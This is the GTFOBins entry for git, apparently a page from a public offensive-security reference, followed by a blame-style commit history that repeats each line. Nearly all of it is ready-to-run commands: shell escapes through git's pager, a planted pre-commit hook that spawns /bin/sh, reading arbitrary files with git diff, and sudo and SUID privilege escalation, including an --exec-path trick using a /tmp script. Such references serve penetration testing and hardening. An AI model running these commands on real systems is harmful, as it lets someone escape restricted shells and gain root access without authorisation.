GTFOBins.github.io/_gtfobins/git.md

---
functions:
  shell:
    - code: PAGER='sh -c "exec sh 0<&1"' git -p help
    - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
      code: |
        git help config
        !/bin/sh
    - description: Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.
      code: |
        TF=$(mktemp -d)
        git init "$TF"
        echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
        mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
        git -C "$TF" commit --allow-empty -m x
  file-read:
    - description: The read file content is displayed in `diff` style output format.
      code: |
        LFILE=file_to_read
        git diff /dev/null $LFILE
  sudo:
    - code: sudo PAGER='sh -c "exec sh 0<&1"' git -p help
    - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
      code: |
        sudo git -p help config
        !/bin/sh
    - description: The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
      code: |
        sudo git branch --help config
        !/bin/sh
    - description: Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.
      code: |
        TF=$(mktemp -d)
        git init "$TF"
        echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
        mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
        sudo git -C "$TF" commit --allow-empty -m x
    - description: If file creation is allowed, it can be used to change Git path
      code: |
        mkdir /tmp/git
        echo '/bin/bash' > /tmp/git/git-escalation
        chmod +x /tmp/git/git-escalation
        sudo git --exec-path=/tmp/git escalation
  limited-suid:
    - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
---
Add git 2018-07-22 15:06:54 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`shell:`
Make interactive execute whenever possible Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty) 2018-09-07 01:00:01 +02:00			`- code: PAGER='sh -c "exec sh 0<&1"' git -p help`
Add functions with default pager in git 2019-03-31 12:03:34 +02:00			- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
			`code: \|`
Increase the probability that the pager is called by Git `git help config` produces a much longer output, hopefully longer than the terminal window. Close #62 2019-06-23 17:16:13 +02:00			`git help config`
Add functions with default pager in git 2019-03-31 12:03:34 +02:00			`!/bin/sh`
Add git hooks shell Closes #77 as it provides a working example and a possibly better hook. Thanks to jivex5k <wgehalo@gmail.com> for the initial proposal. 2019-12-18 14:38:35 +01:00			- description: Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.
			`code: \|`
			`TF=$(mktemp -d)`
			`git init "$TF"`
			`echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"`
			`mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"`
			`git -C "$TF" commit --allow-empty -m x`
Add file read to git 2020-10-02 14:50:08 +02:00			`file-read:`
			- description: The read file content is displayed in `diff` style output format.
			`code: \|`
			`LFILE=file_to_read`
			`git diff /dev/null $LFILE`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Use the sudo VAR=... syntax instead of using -E 2020-06-10 22:56:05 +02:00			`- code: sudo PAGER='sh -c "exec sh 0<&1"' git -p help`
Updating git sudo to not drop capabilities Close #66 2019-07-08 18:59:40 +02:00			- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
Add functions with default pager in git 2019-03-31 12:03:34 +02:00			`code: \|`
Updating git sudo to not drop capabilities Close #66 2019-07-08 18:59:40 +02:00			`sudo git -p help config`
Add functions with default pager in git 2019-03-31 12:03:34 +02:00			`!/bin/sh`
Adding sub commands sudo for git 2019-10-25 14:19:18 +02:00			- description: The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
			`code: \|`
			`sudo git branch --help config`
			`!/bin/sh`
Add git hooks shell Closes #77 as it provides a working example and a possibly better hook. Thanks to jivex5k <wgehalo@gmail.com> for the initial proposal. 2019-12-18 14:38:35 +01:00			- description: Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.
			`code: \|`
			`TF=$(mktemp -d)`
			`git init "$TF"`
			`echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"`
			`mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"`
			`sudo git -C "$TF" commit --allow-empty -m x`
Add new sudo git function #Yaml_fix 2020-10-02 15:53:06 +02:00			`- description: If file creation is allowed, it can be used to change Git path`
			`code: \|`
			`mkdir /tmp/git`
			`echo '/bin/bash' > /tmp/git/git-escalation`
			`chmod +x /tmp/git/git-escalation`
			`sudo git --exec-path=/tmp/git escalation`
Adopt new function names 2018-10-05 19:55:38 +02:00			`limited-suid:`
Make interactive execute whenever possible Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty) 2018-09-07 01:00:01 +02:00			`- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help`
Add git 2018-07-22 15:06:54 +02:00			`---`